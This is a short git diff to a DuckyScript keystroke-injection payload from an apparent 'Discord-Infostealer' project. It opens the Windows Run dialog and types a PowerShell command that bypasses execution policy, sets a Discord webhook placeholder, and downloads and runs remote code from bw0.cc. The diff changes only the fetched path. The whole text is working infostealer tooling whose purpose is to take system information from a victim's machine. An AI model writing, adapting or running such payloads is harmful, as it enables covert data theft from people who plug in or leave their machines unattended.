diff --git a/Discord-Infostealer/System-Info-to-Discord.txt b/Discord-Infostealer/System-Info-to-Discord.txt index 8df4229..9249544 100644 --- a/Discord-Infostealer/System-Info-to-Discord.txt +++ b/Discord-Infostealer/System-Info-to-Discord.txt @@ -13,6 +13,6 @@ REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -C $hide='y'; $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/info) +STRING powershell -Ep Bypass -C $hide='y'; $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcinfo) ENTER